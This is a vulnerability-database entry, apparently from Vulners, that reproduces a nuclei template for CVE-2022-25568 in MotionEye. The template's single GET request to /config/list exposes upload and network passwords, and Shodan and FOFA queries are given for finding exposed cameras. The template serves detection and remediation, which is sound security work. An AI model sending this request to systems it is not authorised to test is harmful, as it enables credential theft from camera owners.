Lucene search
K

MotionEye Config Info Disclosure

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

MotionEye Config Info Disclosure allows access to sensitive information via a GET request to /config/lis

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-25568
24 Mar 202217:15
attackerkb
Circl
CVE-2022-25568
24 Mar 202219:29
circl
CNNVD
MotionEye-Project MotionEye 信息泄露漏洞
24 Mar 202200:00
cnnvd
CVE
CVE-2022-25568
24 Mar 202216:40
cve
Cvelist
CVE-2022-25568
24 Mar 202216:40
cvelist
Github Security Blog
MotionEye allows attackers to access sensitive information
25 Mar 202200:00
github
NVD
CVE-2022-25568
24 Mar 202217:15
nvd
OSV
GHSA-2C7W-V459-CWGF MotionEye allows attackers to access sensitive information
25 Mar 202200:00
osv
OSV
PYSEC-2022-43141
24 Mar 202217:15
osv
Prion
Design/Logic Flaw
24 Mar 202217:15
prion
Rows per page
id: CVE-2022-25568

info:
  name: MotionEye Config Info Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.
  impact: |
    Unauthenticated attackers can access sensitive MotionEye configuration data including upload passwords and network passwords through the /config/list endpoint when regular user authentication is not configured, potentially compromising camera systems and network access.
  remediation: |
    Update MotionEye to version 0.42.2 or later and ensure regular user passwords are properly configured to restrict access.
  reference:
    - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/
    - https://github.com/ccrisan/motioneye/issues/2292
    - https://nvd.nist.gov/vuln/detail/cve-2022-25568
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Miraitowa70/POC-Notes
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-25568
    cwe-id: CWE-1188
    epss-score: 0.06829
    epss-percentile: 0.93237
    cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: motioneye_project
    product: motioneye
    shodan-query:
      - html:"MotionEye"
      - http.html:"motioneye"
    fofa-query: body="motioneye"
  tags: cve,cve2022,motioneye,config,motioneye_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/config/list"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "upload_password"
          - "network_password"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fd8ca5b074f76279d73955151afa93f6f212e09a6be72ffdfe94ca216ec4000202210087f5d89a4b340286fa01f356c8bd8914e430a5601d345cf6b6a67753d3484743:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 24.3
CVSS 3.17.5
EPSS0.06829
28